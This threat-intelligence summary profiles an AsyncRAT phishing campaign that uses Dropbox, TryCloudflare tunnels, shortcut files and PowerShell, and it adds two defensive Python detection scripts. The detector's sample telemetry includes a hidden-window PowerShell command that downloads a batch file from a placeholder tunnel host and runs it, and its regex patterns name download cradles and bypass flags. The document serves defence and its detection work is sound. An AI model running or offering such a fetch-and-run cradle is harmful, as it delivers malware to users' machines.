Full Report
A malware campaign has been observed delivering a remote access trojan (RAT) named AsyncRAT by making use of Python payloads and TryCloudflare tunnels. "AsyncRAT is a remote access trojan (RAT) that exploits the async/await pattern for efficient, asynchronous communication," Forcepoint X-Labs researcher Jyotika Singh said in an analysis. "It allows attackers to control infected systems
Analysis Summary
# Tool/Technique: AsyncRAT
## Overview
AsyncRAT is an open-source .NET Remote Access Trojan (RAT) whose name refers to its use of the C# `async/await` pattern for asynchronous communication with its command and control (C2) infrastructure; the pattern is an implementation detail of the client, not a property of the network traffic. It is designed for stealthy remote system control, data exfiltration, and command execution.
## Technical Details
- Type: Malware family (RAT)
- Platform: Windows (.NET binary; consistent with the PowerShell/LNK execution chain described in the source)
- Capabilities: Remote control, data exfiltration, command execution, stealthy operation.
- First Seen: Not stated in the source; the source notes that variants of this campaign have been observed recently, including last year.
## MITRE ATT&CK Mapping
*Note: Mappings are inferred based on the description of a RAT and its delivery chain.*
- T1059 - Command and Scripting Interpreter
- T1059.001 - PowerShell
- T1071 - Application Layer Protocol
- T1071.001 - Web Protocols
- T1560 - Archive Collected Data (speculative: the ZIP in this chain is a delivery lure, not staged victim data; retain only if archiving of collected data is confirmed)
- T1560.001 - Archive via Utility (same caveat)
- T1041 - Exfiltration Over C2 Channel
## Functionality
### Core Capabilities
- Establishing asynchronous, efficient remote communication with C2.
- Allowing attackers to control infected systems.
- Executing arbitrary commands provided by the operator.
### Advanced Features
- Designed for stealthy operation to remain hidden during command execution and data theft.
## Indicators of Compromise
- File Hashes: [Not provided in the context]
- File Names: [Python payload(s) containing AsyncRAT components]
- Registry Keys: [Not provided in the context]
- Network Indicators: [Not provided in the context; the `async/await` pattern is client-side code and is not observable on the wire]
- Behavioral Indicators: Creation and execution of LNK files leading to PowerShell execution; download chains utilizing legitimate services like TryCloudflare and Dropbox.
## Associated Threat Actors
- Threat actors leveraging phishing campaigns and legitimate infrastructure abuse (Dropbox, TryCloudflare).
## Detection Methods
- Signature-based detection for known AsyncRAT binaries.
- Behavioral detection flagging LNK file execution leading to PowerShell scripts.
- Network monitoring for connections to `trycloudflare[.]com` subdomains used to stage the LNK file; the source does not give AsyncRAT's own C2 endpoints, so pair this with monitoring of outbound connections from the process that hosts the Python payload once it is deployed.
## Mitigation Strategies
- Implement robust email filtering to block phishing attempts originating from untrusted sources or links pointing to file hosting services (Dropbox) or URL shorteners.
- Block or warn on execution of Internet Shortcut (.URL) and Windows Shortcut (.LNK) files from untrusted sources, especially when they arrive inside downloaded ZIP archives.
- Application whitelisting to restrict unauthorized script execution (PowerShell).
- Monitor for unusual outbound network connections originating from typical user application processes.
## Related Tools/Techniques
- **Malware Families:** Venom RAT, XWorm, GuLoader, PureLogs Stealer, Remcos RAT, SapphireRAT, MetaStealer, Sliver implant.
- **Techniques/Infrastructure Used:** Phishing via email, use of legitimate services (Dropbox, TryCloudflare, Cloudflare Workers) for payload staging and delivery.
***
# Tool/Technique: TryCloudflare Tunnels
## Overview
TryCloudflare tunnels are the free, no-account "quick tunnel" mode of Cloudflare Tunnel (`cloudflared`), a legitimate service used to expose a local web server to the internet via a dedicated, ephemeral subdomain on `trycloudflare[.]com` without opening firewall ports. Because the subdomain is random and short-lived, attackers are abusing the service to host infection stages temporarily.
## Technical Details
- Type: Legitimate Infrastructure abused as a Service/Technique
- Platform: Network/Web Infrastructure
- Capabilities: Proxying traffic from a public-facing `trycloudflare[.]com` subdomain to a private server endpoint.
- First Seen: N/A (Legitimate service, abuse observed recently)
## MITRE ATT&CK Mapping
- T1105 - Ingress Tool Transfer (Used to fetch the next stage payload: LNK file)
- T1071 - Application Layer Protocol
## Functionality
### Core Capabilities
- Creating a dedicated, proxied channel (subdomain) to the attacker's host without standard port opening.
### Advanced Features
- Used in this context to host the malicious LNK file, adding a layer of perceived legitimacy by using a known Cloudflare service.
## Indicators of Compromise
- File Hashes: [Not provided in the context]
- File Names: [LNK file retrieved via a TryCloudflare URL]
- Registry Keys: [Not applicable]
- Network Indicators: Connections to attacker-controlled subdomains on `trycloudflare[.]com`.
- Behavioral Indicators: PowerShell fetching content from a TryCloudflare URL.
## Associated Threat Actors
- Threat actors utilizing multi-stage infection chains involving the abuse of legitimate cloud services.
## Detection Methods
- Proxy or firewall rules flagging traffic to `trycloudflare[.]com` subdomains, especially when the requesting process is PowerShell or the fetched content is an LNK file or script (initial access payloads).
- Monitoring for the retrieval of LNK files or scripts from temporary cloud service endpoints.
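A practical place to apply the second check is at the archive boundary: the chain described above delivers a ZIP whose `.URL` member points at the TryCloudflare subdomain that serves the LNK. The following script is an added example for this summary, not code from the original article or from Forcepoint. It parses Windows Internet Shortcut files (INI format, `[InternetShortcut]` section, `URL=` key) found inside a ZIP and flags targets on tunnelling or staging domains. The sample archive is constructed, and the host `abc-def.trycloudflare.com` and member names are placeholders.

```python
"""Inspect a ZIP lure for Internet Shortcut (.url) members that pull the next
stage from a tunnelling/staging host such as a trycloudflare.com subdomain.

Added example for this summary; not code from the original article or from
Forcepoint. The sample archive is constructed and the host name is a placeholder.
"""
import configparser
import io
import zipfile
from typing import Dict, List, Optional
from urllib.parse import urlsplit

# Domains whose subdomains are used for ephemeral payload staging in the chain.
STAGING_DOMAINS = ("trycloudflare.com", "workers.dev")


def parse_internet_shortcut(text: str) -> Optional[str]:
    """Return the URL= target of a Windows Internet Shortcut, or None."""
    cp = configparser.ConfigParser(interpolation=None, strict=False, delimiters=("=",))
    try:
        cp.read_string(text)
    except configparser.Error:
        return None
    if not cp.has_section("InternetShortcut"):
        return None
    # Option names are case-insensitive in configparser, so "URL" works.
    return cp.get("InternetShortcut", "URL", fallback=None)


def host_is_staging(url: str) -> bool:
    """True when the URL host is a staging domain or one of its subdomains."""
    host = (urlsplit(url).hostname or "").lower()
    return any(host == d or host.endswith("." + d) for d in STAGING_DOMAINS)


def scan_archive(zip_bytes: bytes) -> List[Dict[str, object]]:
    """Walk a ZIP and report shortcut members and where they point."""
    findings: List[Dict[str, object]] = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            name = info.filename.lower()
            if name.endswith(".lnk"):
                findings.append({"member": info.filename,
                                 "reason": "windows shortcut inside archive"})
            elif name.endswith(".url"):
                # utf-8-sig strips a BOM that some editors prepend to .url files.
                text = zf.read(info).decode("utf-8-sig", errors="replace")
                target = parse_internet_shortcut(text)
                if target is None:
                    continue
                finding: Dict[str, object] = {"member": info.filename,
                                              "target": target,
                                              "reason": "internet shortcut"}
                if host_is_staging(target):
                    finding["reason"] = "internet shortcut targets tunnelling/staging host"
                # A .url that fetches a .lnk is the exact hand-off seen in this chain.
                finding["fetches_lnk"] = target.lower().split("?")[0].endswith(".lnk")
                findings.append(finding)
    return findings


def build_sample_lure() -> bytes:
    """Constructed sample: a decoy PDF name beside a .url that pulls a LNK."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Invoice.pdf", b"%PDF-1.4 decoy")
        zf.writestr(
            "Invoice.url",
            "[InternetShortcut]\r\nURL=https://abc-def.trycloudflare.com/stage/Invoice.lnk\r\n",
        )
    return buf.getvalue()


if __name__ == "__main__":
    for finding in scan_archive(build_sample_lure()):
        print(finding)
```

The same `host_is_staging` check can be applied to proxy logs; the suffix match on the registered domain avoids the false negative where a lookalike such as `trycloudflare.com.evil.example` would otherwise pass an exact-match rule in the wrong direction.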
## Mitigation Strategies
- Implement strict egress filtering to minimize connections to known temporary file hosting or tunneling services, if possible.
- Enhance user training to be suspicious of attachments leading to LNK files, even if the initiating URL appears reputable.
- Monitor PowerShell execution for download cradle capabilities initiated from unusual network sources.
## Related Tools/Techniques
- Cloudflare Workers (also mentioned as being abused for credential harvesting).
- Use of legitimate cloud storage (Dropbox) for initial file staging.
***
# Technique: Multi-Stage Infection Chain via Phishing (LNK/URL abuse)
## Overview
This technique involves a multi-stage infection sequence starting with a phishing email that directs the user to a Dropbox URL. This leads to the download of a ZIP containing a URL file, which pulls the next stage (a LNK shortcut) from a TryCloudflare tunnel. This LNK file executes PowerShell, leading to further script downloads (BAT) and finally launching the malware payload(s).
## Technical Details
- Type: Technique
- Platform: Windows (due to LNK/PowerShell usage)
- Capabilities: Evasion of security controls through multiple stages, utilization of legitimate infrastructure for hosting, and distraction via decoy documents.
- First Seen: The specific orchestration variant is recent, though multi-stage attacks are common.
## MITRE ATT&CK Mapping
- T1566 - Phishing
- T1566.002 - Spearphishing Link (the email carries a Dropbox URL rather than an attachment)
- T1204 - User Execution
- T1204.002 - Malicious File
- T1204.001 - Malicious Link (user follows the Dropbox URL; this is not a drive-by compromise, since every stage requires user interaction)
- T1036 - Masquerading (Decoy PDF displayed)
- T1059 - Command and Scripting Interpreter
- T1059.001 - PowerShell
## Functionality
### Core Capabilities
- Initial infection via social engineering (phishing email).
- Staging payloads using trusted infrastructure (Dropbox URLs).
- Sequential execution of file types: ZIP $\rightarrow$ URL file $\rightarrow$ LNK file.
- Utilizing the LNK file to launch PowerShell for subsequent downloads.
### Advanced Features
- Displaying a benign decoy PDF document to the recipient to mask system activity.
- Leveraging legitimate tunneling services (TryCloudflare) to host the critical LNK file.
## Indicators of Compromise
- File Hashes: [Not provided in the context]
- File Names: ZIP archive, Internet Shortcut (.URL file), Windows Shortcut (.LNK file), Decoy PDF, Batch script (.BAT file), Python payload.
- Registry Keys: [Not provided in the context]
- Network Indicators: Dropbox URLs, `trycloudflare[.]com` subdomains.
- Behavioral Indicators: Execution chain involving LNK $\rightarrow$ PowerShell $\rightarrow$ download of ZIP/script.
## Associated Threat Actors
- Threat actors employing sophisticated multi-stage delivery mechanisms.
## Detection Methods
- Monitoring for the execution sequence: URL/LNK file execution $\rightarrow$ PowerShell launch.
- Analyzing the structure of downloaded archives for unusual combinations (e.g., URL file alongside LNK file).
- Detecting scripts originating from network connections to Dropbox or Cloudflare services that initiate further file downloads.
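The detection sequence above can be expressed as a rule over process-creation telemetry. The script below is an added example for this summary, not code from the original article or from Forcepoint. It scores PowerShell processes on the signals the chain produces (spawned by `explorer.exe` as a shortcut target, a download cradle in the command line, a fetch from a TryCloudflare or Dropbox host, hidden-window or policy-bypass flags, and a child `cmd.exe` running a batch file from a user-writable path). The event records are constructed in a Sysmon Event ID 1-like shape; the field names, paths and the host `abc-def.trycloudflare.com` are assumptions.

```python
"""Flag the shortcut -> PowerShell -> download cradle -> batch chain in
process-creation telemetry.

Added example for this summary; not code from the original article or from
Forcepoint. Records are constructed in a Sysmon Event ID 1-like shape; field
names, paths and the trycloudflare host are assumptions.
"""
import re
from typing import Dict, List, Optional, Tuple

Event = Dict[str, object]

# PowerShell download primitives commonly used as cradles.
DOWNLOAD_CRADLE = re.compile(
    r"\b(Invoke-WebRequest|iwr|curl|wget|Invoke-RestMethod|irm|"
    r"DownloadString|DownloadFile|Start-BitsTransfer)\b",
    re.IGNORECASE,
)
# Tunnelling / file-hosting hosts used in the described delivery chain.
STAGING_HOST = re.compile(
    r"https?://[\w.-]+\.trycloudflare\.com/|https?://(www\.)?dropbox\.com/",
    re.IGNORECASE,
)
# Flags that hide the console or bypass script policy.
EVASION_FLAGS = re.compile(
    r"-(w|win|windowstyle)\s+hidden|-nop\b|-noprofile\b|"
    r"-(ep|exec|executionpolicy)\s+bypass",
    re.IGNORECASE,
)
# Batch/script files launched from locations a user (or a cradle) can write to.
USER_WRITABLE_SCRIPT = re.compile(
    r"\\(AppData\\Local\\Temp|Downloads)\\[^\s\"]+\.(bat|cmd|ps1)\b", re.IGNORECASE
)


def powershell_reasons(ev: Event, parent: Optional[Event], children: List[Event]) -> List[str]:
    """Return the suspicious signals on a single PowerShell process (empty if not PowerShell)."""
    image = str(ev["image"]).lower()
    if not image.endswith(("\\powershell.exe", "\\pwsh.exe")):
        return []
    cmd = str(ev["cmd"])
    reasons: List[str] = []
    if parent is not None and str(parent["image"]).lower().endswith("\\explorer.exe"):
        # explorer.exe launches the LNK target directly; the .lnk path itself
        # does not appear in the child's command line.
        reasons.append("spawned by explorer.exe (shortcut double-click)")
    if DOWNLOAD_CRADLE.search(cmd):
        reasons.append("download cradle in command line")
    if STAGING_HOST.search(cmd):
        reasons.append("fetches from tunnel/file-hosting domain")
    if EVASION_FLAGS.search(cmd):
        reasons.append("hidden window or policy bypass flags")
    for child in children:
        if str(child["image"]).lower().endswith("\\cmd.exe") and USER_WRITABLE_SCRIPT.search(str(child["cmd"])):
            reasons.append("spawns batch script from user-writable path")
            break
    return reasons


def detect(events: List[Event]) -> List[Tuple[int, List[str]]]:
    """Alert on PowerShell processes with a fetch signal plus corroboration."""
    by_pid = {int(e["pid"]): e for e in events}
    kids: Dict[int, List[Event]] = {}
    for e in events:
        kids.setdefault(int(e["ppid"]), []).append(e)
    alerts: List[Tuple[int, List[str]]] = []
    for e in events:
        reasons = powershell_reasons(e, by_pid.get(int(e["ppid"])), kids.get(int(e["pid"]), []))
        # Require a network-fetch signal plus at least one other signal, so an
        # interactive "powershell -NoProfile" from explorer.exe does not fire.
        fetch = any(r.startswith(("download", "fetches")) for r in reasons)
        if fetch and len(reasons) >= 2:
            alerts.append((int(e["pid"]), reasons))
    return alerts


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed telemetry: one malicious chain and two benign PowerShell launches.
SAMPLE_EVENTS: List[Event] = [
    {"pid": 4, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    {"pid": 12, "ppid": 4, "image": PS,
     "cmd": r'powershell.exe -w hidden -nop -c "iwr https://abc-def.trycloudflare.com/s.bat'
            r' -OutFile $env:TEMP\s.bat; cmd /c $env:TEMP\s.bat"'},
    {"pid": 13, "ppid": 12, "image": r"C:\Windows\System32\cmd.exe",
     "cmd": r"cmd /c C:\Users\u\AppData\Local\Temp\s.bat"},
    {"pid": 20, "ppid": 4, "image": PS, "cmd": "powershell.exe -NoProfile -Command Get-Process"},
    {"pid": 30, "ppid": 2, "image": PS,
     "cmd": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\update.ps1"},
]

if __name__ == "__main__":
    for pid, why in detect(SAMPLE_EVENTS):
        print(pid, why)
```

Only the chain rooted at pid 12 alerts: the `-NoProfile` launch from `explorer.exe` and the scheduled `-ExecutionPolicy Bypass` script each carry a single evasion signal and no fetch, which is the false-positive class a rule keyed solely on PowerShell flags would swallow.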
## Mitigation Strategies
- Educate users to be highly suspicious of shortcut (.LNK) files downloaded from emails, regardless of the originating source.
- Use EDR solutions configured to monitor and block suspicious PowerShell command-line arguments, especially those involving downloading content from the internet.
- Implement controls to prevent the execution of LNK files or scripts originating from temporary download locations.
## Related Tools/Techniques
- Phishing-as-a-Service (PhaaS) toolkits (mentioned in context).
- Abuse of Cloudflare Workers.
- Techniques distributing malware via government/official domain spoofing.